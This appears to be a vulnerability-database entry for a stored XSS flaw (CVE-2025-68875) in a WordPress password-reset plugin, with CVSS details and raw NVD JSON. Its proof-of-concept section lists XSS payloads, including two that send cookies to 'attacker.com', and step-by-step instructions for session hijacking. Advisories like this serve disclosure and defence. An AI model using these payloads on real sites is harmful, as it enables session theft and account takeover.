Security Vulnerability Report
CVE-2025-68875 CVSS 6.5 MEDIUM

Published: 2026-01-08 10:15:54
Last Modified: 2026-04-27 19:16:37

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jcaruso001 Flaming Password Reset flaming-password-reset allows Stored XSS. This issue affects Flaming Password Reset: from n/a through <= 1.0.3.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Flaming Password Reset (flaming-password-reset) <= 1.0.3
Flaming Password Reset all versions (from n/a through 1.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-68875 PoC: Stored XSS in Flaming Password Reset -->
<!-- Attack Scenario: Inject malicious JavaScript via plugin input field -->

<!-- Method 1: Basic XSS Payload -->
<script>alert(document.cookie)</script>

<!-- Method 2: Cookie Stealing Payload -->
<img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie">

<!-- Method 3: Session Hijacking Payload -->
<script>
fetch('https://attacker.com/log?data='+btoa(document.cookie));
</script>

<!-- Method 4: Base64-encoded payload in an event handler (decodes to alert('XSS Attack')) -->
<img src="x" onerror="eval(atob('YWxlcnQoJ1hTUyBBdHRhY2snKQ=='))">

<!--
Exploitation Steps:
1. Attacker registers low-privilege account on WordPress site
2. Attacker identifies plugin input fields (password reset related)
3. Attacker injects malicious XSS payload into input field
4. Payload gets stored in database via plugin functionality
5. When admin/user views affected page, payload executes
6. Attacker steals session cookies or performs actions as victim
-->

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68875", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:53.823", "lastModified": "2026-04-27T19:16:37.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jcaruso001 Flaming Password Reset flaming-password-reset allows Stored XSS.This issue affects Flaming Password Reset: from n/a through <= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/flaming-password-reset/vulnerability/wordpress-flaming-password-reset-plugin-1-0-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}